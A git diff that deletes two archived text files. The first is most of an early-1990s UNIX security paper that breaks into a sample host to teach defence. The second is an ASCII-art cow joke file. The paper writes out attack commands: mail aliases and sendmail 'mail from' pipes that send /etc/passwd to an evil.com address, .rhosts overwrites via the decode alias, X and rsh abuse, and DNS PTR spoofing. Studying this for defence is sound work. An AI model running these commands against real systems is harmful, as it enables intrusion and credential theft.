NIS domainname. This can be very useful when combined with the fact -that you can get arbitrary NIS maps (such as the password file) when you -know the NIS domainname. Here is a sample code snippet to do just that -(bootparam is part of SATAN.) - - char *server; - struct bp_whoami_arg arg; /* query */ - struct bp_whoami_res res; /* reply */ - - /* initializations omitted... */ - - callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI, - xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res); - - printf("%s has nisdomain %s\n", server, res.domain_name); - -The showmount output indicated that "easy" is a diskless client of -victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI -query: - - evil % bootparam victim.com easy.victim.com - victim.com has nisdomain foo_bar - ----- - -NIS masters control the mail aliases for the NIS domain in question. -Just like local mail alias files, you can create a mail alias that will -execute commands when mail is sent to it (a once popular example of this -is the "decode" alias which uudecodes mail files sent to it.) For -instance, here you create an alias "foo", which mails the password file -back to evil.com by simply mailing any message to it: - - nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases - nis-master # cd /var/yp - nis-master # make aliases - nis-master # echo test | mail -v foo@victim.com - -Hopefully attackers won't have control of your NIS master host, but even -more hopefully the lesson is clear -- NIS is normally insecure, but if -an attacker has control of your NIS master, then s/he effectively has -control of the client hosts (e.g. can execute arbitrary commands). - -There aren't many effective defenses against NIS attacks; it is an -insecure service that has almost no authentication between clients and -servers. To make things worse, it seems fairly clear that arbitrary -maps can be forced onto even master servers (e.g., it is possible to -treat an NIS server as a client). This, obviously, would subvert the -entire schema. If it is absolutely necessary to use NIS, choosing a -hard to guess domainname can help slightly, but if you run diskless -clients that are exposed to potential attackers then it is trivial for -an attacker to defeat this simple step by using the bootparam trick to -get the domainname. If NIS is used to propagate the password maps, then -shadow passwords do not give additional protection because the shadow -map is still accessible to any attacker that has root on an attacking -host. Better is to use NIS as little as possible, or to at least -realize that the maps can be subject to perusal by potentially hostile -forces. - -Secure RPC goes a long way to diminish the threat, but it has its own -problems, primarily in that it is difficult to administer, but also in -that the cryptographic methods used within are not very strong. It has -been rumored that NIS+, Sun's new network information service, fixes -some of these problems, but until now it has been limited to running on -Suns, and thus far has not lived up to the promise of the design. -Finally, using packet filtering (at the very least port 111) or -securelib (see appendix D), or, for Suns, applying Sun patch 100482-02 -all can help. - ----- - -The portmapper only knows about RPC services. Other network services -can be located with a brute-force method that connects to all network -ports. Many network utilities and windowing systems listen to specific -ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is -usually on port 6000, etc.) SATAN includes a program that scans the -ports of a remote hosts and reports on its findings; if you run it -against our target, you see: - - evil % tcpmap victim.com - Mapping 128.128.128.1 - port 21: ftp - port 23: telnet - port 25: smtp - port 37: time - port 79: finger - port 512: exec - port 513: login - port 514: shell - port 515: printer - port 6000: (X) - -This suggests that victim.com is running X windows. If not protected -properly (via the magic cookie or xhost mechanisms), window displays can -be captured or watched, user keystrokes may be stolen, programs executed -remotely, etc. Also, if the target is running X and accepts a telnet to -port 6000, that can be used for a denial of service attack, as the -target's windowing system will often "freeze up" for a short period of -time. One method to determine the vulnerability of an X server is to -connect to it via the XOpenDisplay() function; if the function returns -NULL then you cannot access the victim's display (opendisplay is part of -SATAN): - - char *hostname; - - if (XOpenDisplay(hostname) == NULL) { - printf("Cannot open display: %s\n", hostname); - } else { - printf("Can open display: %s\n", hostname); - } - - evil % opendisplay victim.com:0 - Cannot open display: victim.com:0 - -X terminals, though much less powerful than a complete UNIX system, can -have their own security problems. Many X terminals permit unrestricted -rsh access, allowing you to start X client programs in the victim's -terminal with the output appearing on your own screen: - - evil % xhost +xvictim.victim.com - evil % rsh xvictim.victim.com telnet victim.com -display evil.com - -In any case, give as much thought to your window security as your -filesystem and network utilities, for it can compromise your system as -surely as a "+" in your hosts.equiv or a passwordless (root) account. - ----- - -Next, you examine sendmail. Sendmail is a very complex program that has -a long history of security problems, including the infamous "wiz" -command (hopefully long since disabled on all machines). You can often -determine the OS, sometimes down to the version number, of the target, -by looking at the version number returned by sendmail. This, in turn, -can give you hints as to how vulnerable it might be to any of the -numerous bugs. In addition, you can see if they run the "decode" alias, -which has its own set of problems: - - evil % telnet victim.com 25 - connecting to host victim.com (128.128.128.1.), port 25 - connection open - 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT - expn decode - 250 <"|/usr/bin/uudecode"> - quit - -Running the "decode" alias is a security risk -- it allows potential -attackers to overwrite any file that is writable by the owner of that -alias -- often daemon, but potentially any user. Consider this piece of -mail -- this will place "evil.com" in user zen's .rhosts file if it is -writable: - - evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com - -If no home directories are known or writable, an interesting variation -of this is to create a bogus /etc/aliases.pag file that contains an -alias with a command you wish to execute on your target. This may work -since on many systems the aliases.pag and aliases.dir files, which -control the system's mail aliases, are writable to the world. - - evil % cat decode - bin: "| cat /etc/passwd | mail zen@evil.com" - evil % newaliases -oQ/tmp -oA`pwd`/decode - evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com - evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null - -A lot of things can be found out by just asking sendmail if an address -is acceptable (vrfy), or what an address expands to (expn). When the -finger or rusers services are turned off, vrfy and expn can still be -used to identify user accounts or targets. Vrfy and expn can also be -used to find out if the user is piping mail through any program that -might be exploited (e.g. vacation, mail sorters, etc.). It can be a -good idea to disable the vrfy and expn commands: in most versions, look -at the source file srvrsmtp.c, and either delete or change the two lines -in the CmdTab structure that have the strings "vrfy" and "expn". Sites -without source can still disable expn and vrfy by just editing the -sendmail executable with a binary editor and replacing "vrfy" and "expn" -with blanks. Acquiring a recent version of sendmail (see Appendix D) is -also an extremely good idea, since there have probably been more -security bugs reported in sendmail than in any other UNIX program. - ----- - -As a sendmail-sendoff, there are two fairly well known bugs that should -be checked into. The first was definitely fixed in version 5.59 from -Berkeley; despite the messages below, for versions of sendmail previous -to 5.59, the "evil.com" gets appended, despite the error messages, along -with all of the typical mail headers, to the file specified: - - % cat evil_sendmail - telnet victim.com 25 << EOSM - rcpt to: /home/zen/.rhosts - mail from: zen - data - random garbage - . - rcpt to: /home/zen/.rhosts - mail from: zen - data - evil.com - . - quit - EOSM - - evil % /bin/sh evil_sendmail - Trying 128.128.128.1 - Connected to victim.com - Escape character is '^]'. - Connection closed by foreign host. - - evil % rlogin victim.com -l zen - Welcome to victim.com! - victim % - -The second hole, fixed only recently, permitted anyone to specify -arbitrary shell commands and/or pathnames for the sender and/or -destination address. Attempts to keep details secret were in vain, and -extensive discussions in mailing lists and usenet news groups led to -disclosure of how to exploit some versions of the bug. As with many -UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem, -since they all share a common source code tree ancestry. Space -precludes us from discussing it fully, but a typical attack to get the -password file might look like this: - - evil % telnet victim.com 25 - Trying 128.128.128.1... - Connected to victim.com - Escape character is '^]'. - 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 - mail from: "|/bin/mail zen@evil.com < /etc/passwd" - 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok - rcpt to: nosuchuser - 550 nosuchuser... User unknown - data - 354 Enter mail, end with "." on a line by itself - . - 250 Mail accepted - quit - Connection closed by foreign host. - evil % - -At the time of writing, version 8.6.4 of sendmail (see Appendix D for -information on how to get this) is reportedly the only variant of -sendmail with all of the recent security bugs fixed. - -Trust ------ - -For our final topic of vulnerability, we'll digress from the practical -strategy we've followed previously to go a bit more into the theoretical -side, and briefly discuss the notion of trust. The issues and -implications of vulnerabilities here are a bit more subtle and -far-reaching than what we've covered before; in the context of this -paper we use the word trust whenever there is a situation when a server -(note that any host that allows remote access can be called a server) -can permit a local resource to be used by a client without password -authentication when password authentication is normally required. In -other words, we arbitrarily limit the discussion to clients in disguise. - -There are many ways that a host can trust: .rhosts and hosts.equiv files -that allow access without password verification; window servers that -allow remote systems to use and abuse privileges; export files that -control access via NFS, and more. - -Nearly all of these rely on client IP address to hostname conversion to -determine whether or not service is to be granted. The simplest method -uses the /etc/hosts file for a direct lookup. However, today most hosts -use either DNS (the Domain Name Service), NIS, or both for name lookup -service. A reverse lookup occurs when a server has an IP address (from -a client host connecting to it) and wishes to get the corresponding -client hostname. - -Although the concept of how host trust works is well understood by most -system administrators, the _dangers_ of trust, and the _practical_ -problem it represents, irrespective of hostname impersonation, is one of -the least understood problems we know of on the Internet. This goes far -beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing -systems -- indeed, much of the useful services in UNIX are based on the -concept that well known (to an administrator or user) sites are trusted -in some way. What is not understood is how networking so tightly binds -security between what are normally considered disjoint hosts. - -Any form of trust can be spoofed, fooled, or subverted, especially when -the authority that gets queried to check the credentials of the client -is either outside of the server's administrative domain, or when the -trust mechanism is based on something that has a weak form of -authentication; both are usually the case. - -Obviously, if the host containing the database (either NIS, DNS, or -whatever) has been compromised, the intruder can convince the target -host that s/he is coming from any trusted host; it is now sufficient to -find out which hosts are trusted by the target. This task is often -greatly helped by examining where system administrators and system -accounts (such as root, etc.) last logged in from. Going back to our -target, victim.com, you note that root and some other system accounts -logged in from big.victim.com. You change the PTR record for evil.com so -that when you attempt to rlogin in from evil.com to victim.com, -victim.com will attempt to look up your hostname and will find what you -placed in the record. If the record in the DNS database looks like: - - 1.192.192.192.in-addr.arpa IN PTR evil.com - -And you change it to: - - 1.192.192.192.in-addr.arpa IN PTR big.victim.com - -then, depending on how naive victim.com's system software is, victim.com -will believe the login comes from big.victim.com, and, assuming that -big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be -able to login without supplying a password. With NIS, it is a simple -matter of either editing the host database on the NIS master (if this is -controlled by the intruder) or of spoofing or forcing NIS (see -discussion on NIS security above) to supply the target with whatever -information you desire. Although more complex, interesting, and -damaging attacks can be mounted via DNS, time and space don't allow -coverage of these methods here. - -Two methods can be used to prevent such attacks. The first is the most -direct, but perhaps the most impractical. If your site doesn't use any -trust, you won't be as vulnerable to host spoofing. The other strategy -is to use cryptographic protocols. Using the secure RPC protocol (used -in secure NFS, NIS+, etc.) is one method; although it has been "broken" -cryptographically, it still provides better assurance than RPC -authentication schemes that do not use any form of encryption. Other -solutions, both hardware (smartcards) and software (Kerberos), are being -developed, but they are either incomplete or require changes to system -software. - -Appendix B details the results of an informal survey taken from a -variety of hosts on the Internet. - -Protecting the system ---------------------- - -It is our hope that we have demonstrated that even some of the most -seemingly innocuous services run can offer (sometimes unexpectedly) -ammunition to determined system crackers. But, of course, if security -were all that mattered, computers would never be turned on, let alone -hooked into a network with literally millions of potential intruders. -Rather than reiterating specific advice on what to switch on or off, we -instead offer some general suggestions: - -o If you cannot turn off the finger service, consider installing a -modified finger daemon. It is rarely necessary to reveal a user's home -directory and the source of last login. - -o Don't run NIS unless it's absolutely necessary. Use NFS as little -as possible. - -o Never export NFS filesystems unrestricted to the world. Try to -export file systems read-only where possible. - -o Fortify and protect servers (e.g. hosts that provide a service to -other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative -accounts on these hosts. - -o Examine carefully services offered by inetd and the portmapper. -Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd -wrappers, if for no other reason than to log the sources of connections -to your host. This adds immeasurably to the standard UNIX auditing -features, especially with respect to network attacks. If possible, use -the loghost mechanism of syslog to collect security-related information -on a secure host. - -o Eliminate trust unless there is an absolute need for it. Trust is -your enemy. - -o Use shadow passwords and a passwd command that disallows poor -passwords. Disable or delete unused/dormant system or user accounts. - -o Keep abreast of current literature (see our suggested reading list and -bibliography at the end of this paper) and security tools; communicate -to others about security problems and incidents. At minimum, subscribe -to the CERT mailing list and phrack magazine (plus the firewalls mailing -list, if your site is using or thinking about installing a firewall) and -read the usenet security newsgroups to get the latest information on -security problems. Ignorance is the deadliest security problem we are -aware of. - -o Install all vendor security patches as soon as possible, on all of -your hosts. Examine security patch information for other vendors - many -bugs (rdist, sendmail) are common to many UNIX variants. - -It is interesting to note that common solutions to security problems -such as running Kerberos or using one-time passwords or digital tokens -are ineffective against most of the attacks we discuss here. We -heartily recommend the use of such systems, but be aware that they are -_not_ a total security solution -- they are part of a larger struggle to -defend your system. - -Conclusions ------------ - -Perhaps none of the methods shown here are surprising; when writing this -paper, we didn't learn very much about how to break into systems. What -we _did_ learn was, while testing these methods out on our own systems -and that of friendly sites, just how effective this set of methods is -for gaining access to a typical (UNIX) Internet host. Tiring of trying -to type these in all by hand, and desiring to keep our own systems more -secure, we decided to implement a security tool (SATAN) that attempts to -check remote hosts for at least some of the problems discussed here. -The typical response, when telling people about our paper and our tool -was something on the order of "that sounds pretty dangerous -- I hope -you're not going to give it out to everybody. But you since you can -trust me, may I have a copy of it?" - -We never set out to create a cookbook or toolkit of methods and programs -on how to break into systems -- instead, we saw that these same methods -were being used, every day, against ourselves and against friendly -system administrators. We believe that by propagating information that -normally wasn't available to those outside of the underworld, we can -increase security by raising awareness. Trying to restrict access to -"dangerous" security information has never seemed to be a very effective -method for increasing security; indeed, the opposite appears to be the -case, since the system crackers have shown little reticence to share -their information with each other. - -While it is almost certain that some of the information presented here -is new material to (aspiring) system crackers, and that some will use it -to gain unauthorized entrance onto hosts, the evidence presented even by -our ad hoc tests shows that there is a much larger number of insecure -sites, simply because the system administrators don't know any better -- -they aren't stupid or slow, they simply are unable to spend the very -little free time that they have to explore all of the security issues -that pertain to their systems. Combine that with no easy access to this -sort of information and you have poorly defended systems. We (modestly) -hope that this paper will provide badly-needed data on how systems are -broken into, and further, to explain _why_ certain steps should be taken -to secure a system. Knowing why something is a problem is, in our -opinion, the real key to learning and to making an informed, intelligent -choice as to what security really means for your site. - ----- - -Appendix A: - -SATAN (Security Analysis Tool for Auditing Networks) - -Originally conceived some years ago, SATAN is actually the prototype of -a much larger and more comprehensive vision of a security tool. In its -current incarnation, SATAN remotely probes and reports various bugs and -weaknesses in network services and windowing systems, as well as -detailing as much generally useful information as possible about the -target(s). It then processes the data with a crude filter and what -might be termed an expert system to generate the final security -analysis. While not particularly fast, it is extremely modular and easy -to modify. - -SATAN consists of several sub-programs, each of which is an executable -file (perl, shell, compiled C binary, whatever) that tests a host for a -given potential weakness. Adding further test programs is as simple as -putting an executable into the main directory with the extension ".sat"; -the driver program will automatically execute it. The driver generates -a set of targets (using DNS and a fast version of ping together to get -"live" targets), and then executes each of the programs over each of the -targets. A data filtering/interpreting program then analyzes the -output, and lastly a reporting program digests everything into a more -readable format. - -The entire package, including source code and documentation, will be -made freely available to the public, via anonymous ftp and by posting it -to one of the numerous source code groups on the Usenet. - ----- - -Appendix B: - -An informal survey conducted on about a dozen Internet sites -(educational, military, and commercial, with over 200 hosts and 40000 -accounts) revealed that on the average, close to 10 percent of a site's -accounts had .rhosts files. These files averaged six trusted hosts -each; however, it was not uncommon to have well over one hundred entries -in an account's .rhosts file, and on a few occasions, the number was -over five hundred! (This is not a record one should be proud of -owning.) In addition, _every_ site directly on the internet (one site -was mostly behind a firewall) trusted a user or host at another site -- -thus, the security of the site was not under the system administrators -direct control. The larger sites, with more users and hosts, had a -lower percentage of users with .rhosts files, but the size of .rhosts -files increased, as well as the number of trusted off-site hosts. - -Although it was very difficult to verify how many of the entries were -valid, with such hostnames such as "Makefile", "Message-Id:", and -"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we -question the wisdom of putting a site's security in the hands of its -users. Many users (especially the ones with larger .rhosts files) -attempted to put shell-style comments in their .rhosts files, which most -UNIX systems attempt to resolve as valid host names. Unfortunately, an -attacker can then use the DNS and NIS hostname spoofing techniques -discussed earlier to set their hostname to "#" and freely log in. This -puts a great many sites at risk (at least one major vendor ships their -systems with comments in their /etc/hosts.equiv files.) - -You might think that these sites were not typical, and, as a matter of -fact, they weren't. Virtually all of the administrators knew a great -deal about security and write security programs for a hobby or -profession, and many of the sites that they worked for did either -security research or created security products. We can only guess at -what a "typical" site might look like. - ----- - -Appendix C: - -After receiving mail from a site that had been broken into from one of -our systems, an investigation was started. In time, we found that the -intruder was working from a list of ".com" (commercial) sites, looking -for hosts with easy-to steal password files. In this case, -"easy-to-steal" referred to sites with a guessable NIS domainname and an -accessible NIS server. Not knowing how far the intruder had gotten, it -looked like a good idea to warn the sites that were in fact vulnerable -to password file theft. Of the 656 hosts in the intruder's hit list, 24 -had easy-to-steal password files -- about one in twenty-five hosts! One -third of these files contained at least one password-less account with -an interactive shell. With a grand total of 1594 password-file entries, -a ten-minute run of a publically-available password cracker (Crack) -revealed more than 50 passwords, using nothing but a low-end Sun -workstation. Another 40 passwords were found within the next 20 -minutes; and a root password was found in just over an hour. The result -after a few days of cracking: five root passwords found, 19 out of 24 -password files (eighty percent) with at least one known password, and -259 of 1594 (one in six) passwords guessed. - ----- - -Appendix D: - -How to get some free security resources on the Internet - -Mailing lists: - -o The CERT (Computer Emergency Response Team) advisory mailing list. -Send e-mail to cert@cert.org, and ask to be placed on their mailing -list. - -o The Phrack newsletter. Send an e-mail message to -phrack@well.sf.ca.us and ask to be added to the list. - -o The Firewalls mailing list. Send the following line to -majordomo@greatcircle.com: - - subscribe firewalls - -o Computer Underground Digest. Send e-mail to -tk0jut2@mvs.cso.niu.edu, asking to be placed on the list. - -Free Software: - -COPS (Computer Oracle and Password System) is available via anonymous -ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+. - -The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl, -in pub/security. - -Crack is available from ftp.uu.net, in /usenet/comp.sources.misc/volume28. - -TAMU is a UNIX auditing tool that is part of a larger suite of excellent -tools put out by a group at the Texas A&M University. They can be -gotten via anonymous ftp at net.tamu.edu, in pub/security/TAMU. - -Sources for ftpd and many other network utilities can be found in -ftp.uu.net, in packages/bsd-sources. - -Source for ISS (Internet Security Scanner), a tool that remotely scans -for various network vulnerabilities, is available via anonymous ftp from -ftp.uu.net, in usenet/comp.sources.misc/volume40/iss. - -Securelib is available via anonymous ftp from ftp.uu.net, in -usenet/comp.sources.misc/volume36/securelib. - -The latest version of berkeley sendmail is available via anonymous ftp -from ftp.cs.berkeley.edu, in ucb/sendmail. - -Tripwire, a UNIX filesystem integrity checker+, is available via anonymous -ftp at ftp.cs.purdue.edu, in pub/spaf/COAST/Tripwire. - ----- - -Bibliography: - -Baldwin, Robert W., Rule Based Analysis of Computer Security, -Massachusetts Institute of Technology, June 1987. - -Bellovin, Steve, Using the Domain Name System for System Break-ins, -1992 (unpublished). - -Massachusetts Institute of Technology, X Window System Protocol, -Version 11, 1990. - -Shimomura, Tsutomu, private communication. - -Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992. - ----- - -Suggested reading: - -Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite", -Computer Communication Review 19 (2), 1989; a comment by Stephen -Kent appears in volume 19 (3), 1989. - -Garfinkel, Simson and Spafford, Gene, "Practical UNIX Security", -O'Reilly and Associates, Inc., 1992. - -Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol -Study: Network Information Service", Computer Communication Review -22 (5) 1992. - -Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume -Four, Issue Forty-Three, File 14 of 27. - -Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept -1993. - -Schuba, Christoph, "Addressing Weaknesses in the Domain Name System -Protocal", Purdue University, August 1993. - -Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM -27 (8), 1984. diff --git a/.md/thoughts/txt/textfiles.com/cowz.txt b/.md/thoughts/txt/textfiles.com/cowz.txt deleted file mode 100644 index c3142c8..0000000 --- a/.md/thoughts/txt/textfiles.com/cowz.txt +++ /dev/null @@ -1,4526 +0,0 @@ - --==>> THE COMPLETE GUIDE TO COWS <<==--
- as you've NEVER seen them before!
-- - - - - - - - - - - - - - - - - - - - - - - - -
-
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/ /-------\/ /-------\/ /-------\/
- / | || / | || / | || / | ||
-* ||----|| * ||W---|| * ||w---|| * ||V---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- Cow Cow laden Same cow Nancy Reagan-type
- with milk after milking cow with milk
-
-
- (___) (___) * (___) (___)
- (o o) (o o) \ (o o) (o o)
- /-------\ / /-------\ / \-------\ / /-------\ /
- / | ||O / | ||O | ||O / | ~#>-+|O *
-* ||@\--|| ||,---|| * ||,----| ||,---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^
- Bull Same bull after Rotc bull after Red-blooded American Bull
- seeing above cow seeing other bull shooting the Rotc
-
-
-
-
-
-
-
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/-* /-------\/ /-------\/ ~~~~~~~~~~~~~~~~~~~~~
- / | || \ )*)(\/* / * / | ||
-* ||----|| * \ |||/)|/()( ~~~~~~~~~~~~~~
-\/|(/)(/\/(,,/ \)|(/\/|)(/\
- Cow munching Grass munching Cow in water Cow in trouble
- on grass on cow
-
- (__) (__) * (__) * (__)
- (oo) (oo) \ (oo) | (oo)
- /--------\/ /-oooooo-\/ \-------\/ \-------\/
- * o| || * ooooooooo o o| || / ||
- ||----|| ooooooooooooo ||----||>==/-----||
- ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^
- Cow taking Cow in deep Cow getting the shit
- a shit shit kicked out of her
-
-
- (__)
- (oo) U
- /-------\/ /---V
- / | || * |--| .
-* ||----||
- ^^ ^^
-
-Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters.
-
-
-
- (__) )__( vv vv
- (oo) (oo) ||----|| *
- /-------\/ *-------\/ || | /
- / | || / | || /\-------/
-* ||----|| / ||----|| (oo)
- ^^ ^^ vv vv (~~)
-
-American Cow Polish Cow Australian Cow
-
-
-
- (__) (__) (__)
- (oo) ____ (oo) _---_(oo)
- /-------\/ /- --\/ /- -\/
- / | || / | || /| ||
-* ||----|| * ||___-|| * ||___-||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Freshman Cow at Freshman Cow Freshman Cow
-start of school After the "Freshman 15" After the "Freshman 20"
-
-
- (__) (__) (__)
- (OO) (@@) (xx)
- /-------\/ /-------\/ /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Cow who drank Jolt Cow who ate Cow who used Jolt to wash
- psychadelic mushrooms down psychadelic mushrooms
-
-
- /\ __
- / \ ||
- (__) (__) \ / (_||_)
- SooS (oo) \/ (oo)
- /------S\/S /-------\/ /S /-------\/
- / | || / | || / S / | ||
- * ||----|| * ||----||___/ S * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
- This cow belonged Ben Franklin owned Abe Lincoln's
- to George Washington this cow cow
-
-
- (__)
- * (__) (oo)
- \ (oo) /------\/
- \-------\/ /| |/ |
- | ==$ || / | [) ||
- ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Old "One Arm" belonged This cow was given to
- to Ceasar's Palace Hugh Hefner for his Birthday
-
-
- (___) (__) (__)
- ( O ) (oo) (oo)
- /-------\ / \/--------\/
- / | ||V | |
- * ||----|| ||------||
- ^^ ^^ ^^ ^^
- The cyclops that Jason and This cow lived with
- cow had four legs or e
-
-
-
- O__O \_|_/
- (oo) (oo)
- /-------\/ /-------\/
- / | || / | ||
- * ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Cow at Disneyland Cow visiting the Statue of Liberty
-
-
-
- (__) (__)
- ^^ (oo) (--)
- ^^^^ /-------\/ /-\/-\
- ^^^^^ / | || /| |\
- ^^^^^ * ||----|| ^ | | ^
- ^^^^^^^^ ====^^====^^==== | |
-^^^^^^^^^^^^^/ /----\
-^^^^^^^^^^^^^^^^^^ / \ \
-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^ * ^
- Cow Hanging Ten at Malibu Cow sunning at Fort Lauderdale
- (What a bod, huh guys?)
-
-
- )\ (__)
- / \ (oo)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Cow swimming at Amityville
-(Where Jaws was filmed, for those less educated)
-
-
- * (__)
- \ (DD)
- \ /-------\/
- |\ / | ||_\_/
- \ | \ (__) * ||----|
- \\|| \(oo) ^^ ^
- \||\ \\/ Cow chugging brews and staring at
- ^^ \|| sunbathers at Fort Lauderdale
- \\ ||
- \\||
- \||
- ^^ / / / / / / / / / / /
- \\_ / / / / / / / / / / / /
- \_ / / / / / _______ / /
- Cow skiing a Black Diamond at Aspen / / / / | \ / /
- / / / (__)| / /
- / / / (oo)| / /
- ( @@@ ) /-------\/ |
- ( @@ ) (------------) / | ||^_|
- @@ (__) ( *>COUGH<* ) * ||----|
- @@ (oo) . . . ( *>COUGH<* ) ^^ ^
- /--UU--\/ (____________)
- / | || Cow sheltering from English Weather
- * ||---||
-
- (New) Jersey Cow
-
-
- O O O O
- \ \ / /
- \ \ (__) /
- (__) \ \ (xx)/
- (DD) \ +--------+\//
- /-------\/ \| | /
- / | || +--------+
- * ||----||
- ^^ ^^
-Cow fantasizing about "Riding the Mechanical Bull"
- at Gillies in Texas
-
-
- o o
- |__| (__) (__)
- (oo) (oo) =(oo)= oo
- /-------\/ /-------vv /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ~~ ~~ ~~ ~~ ~~ ~~
- bill bixby bela lugosi boris karloff claude rains
- male relative cow cow cow
- cow
-
-
-
-
-
- x
- xxxx|xxxx
- xxxxxxx|xxxxxxx
- |
- //
- (__) // (__) (__)
- (oo)// (oo)===(oo)
- /-------\// /-------\/ \/-------\
- / | |// / | || || | \
- * ||----| * ||----|| ||----|| *
- ^^ ^^ ^^ ^^ ^^ ^^
- Julie Andrews Cow Siamese cows
-
-
- o o (__) ^
- \ / (oo) /
- \ / _____\/___/
- (__) \__/ / /\ / /
- (oo) _______(oo) ^ / * /
- /---------\/ /| ___ \/ / ___/
- / | x=a(b)|| / | { }|| *----/\
- * ||------|| * ||{___}|| / \
- ^^ ^^ ||-----|| / /
- ^^ ^^ ^ ^
-
- Mathematical Television This cow does Disco
- Cow Cow (That's what comes of
- (developer of (Cow-thode snorting cow-caine)
- cow-culus) Ray Tube)
-
-
-
- o
- | [---]
- | |
- | | |------========|
- /----|---|\ | **** |=======|
- /___/___\___\ o | **** |=======|
- | | ___| |==============|
- | | ___ {(__)} |==============|
- \-----------/ []( )={(oo)} |==============|
- \ \ / / /---===--{ \/ } |
- ----------------- / | NASA |==== |
- | | * ||------||-----^
- ----------------- || | |
- / / \ \ ^^ ^ |
- / ---- \
- ^^ ^^ This cow jumped over the Moon
-
-
-
-
- (__)
- ([][]) "I have this recurring dream
- __\/_--U about golden arches.".. (__)
- /\ \__ ^ :..("")
- /\\\ / / //\ ____\_____\/ //
- /----^/__/\ /\ // \\/ \___ / //
- \\\____/--\-- // /-/__________/ //
- | | | H H ||
- |_____________|_____________| H H ||
- ^^^^^^^^^^^^^^^^^^ ^^^^^^^
- Some cows get in trouble... Cattle Guard
-
-
- ( ( )
- ( ( ) )
- ( ( )
- ( / )
- ( ( \\ )
- ( | // )
- | | (__)
- | | (oo) (__)
- | | ----\/ ______(oo)_____
- | | || ( _)_______(__) )
- **| | ---|| \ __________/
- ``'---------^^
- Cow Hide Cow Pie
-
-
- \ | / ___________
- ____________ \ \_# / | ___ | _________
- | | \ #/ | | | | | = = = = |
- | | | | | \\# | |`v'| | | |
- | | \# // | --- ___ | | | || | |
- | | | | | #_// | | | | | |
- | | \\ #_/_______ | | | | | | || | |
- | | | | | \\# /_____/ \ | --- | | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
-^^^| (^^^^^) |^^^^^#^| H |_ |^| | |||| | |^^^^^^| |
- | ( ||| ) | # ^^^^^^ | | |||| | | | ||||||| |
- ^^^^^^^^^^^^^________/ /_____ | | |||| | | | ||||||| |
- `v'- ^^^^^^^^^^^^^ | ||||||| |
- || |`. (__) (__) ( )
- (oo) (oo) /---V
- /-------\/ \/ --------\ * | |
- / | || ||_______| \
- * ||W---|| || || *
- ^^ ^^ ^^ ^^
-
- "Cow Town"
-
-
- \ (__) (__)
- \\(oo) (\/)
- /-----\\\/ /-------\/
- / | (##) / | ||
- * ||----||" * ||----||
- ^^ ^^ ~~ ~~
- This cow plays bagpipes. Cow from Beijing
-
-
- (__) (__) (__)
- (\/) ($$) (**)
- /-------\/ /-------\/ /-------\/
- / | 666 || / |=====|| / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-
-Satanic cow This cow is a Yuppie Cow in love
-
-
- (__) (__)
- (oo) (oo)
- /-'''''-\/ /-------------------\/
- / |'''''|| / | ||
-* ||''''|| * ||----------------||
- ^^ ^^ ^^ ^^
- Cow in Argyle Stretch Cow
- *
- ** **
- * ** * * * **
- * / / \ * *
- \ \ / \ / / (__)
- * / / \ \ (__) \ \ /--------(00)
- / (00) / / / | |( )
- \ /-------\/ \ \ * ||---- ||()
- / / | || / / || ||
- \ \ * ||----|| \ \ ^^ ^^
- / / ^^ ^^ / / Cow Chewing Marbles
- Cow in Heat
-
-
- (___)
- (o o)
- /------\ / (__) (__)
- / ____O (oo) (oo)
- | / /----\----\/ /-------\/
- /\oo===| / || / | ||
- | || *||^-----|| * OO----OO
- * ^^ ^^ ^^
- Cowt in the Act low rider cow
-
-
-
- (__) \__\ (__)
- (oo) o (oo) (oo)
- /-------\/ ____\___\/ *+-------\/
- / | || / | || ||______||
-* ||----|| * ||----|| ||----||
- OO OO OO OO OO OO
-Detroit cow Mustang cow pickup cow
-
-
- (__) (__) \_||_~
- (oo) (oo) (*||*)
- /---------------\/ /----\/ /-------\||/
- / | || / || / | ||
-* ||------------|| *-||----|| * ||----||
- OO OO OO OO OO }{
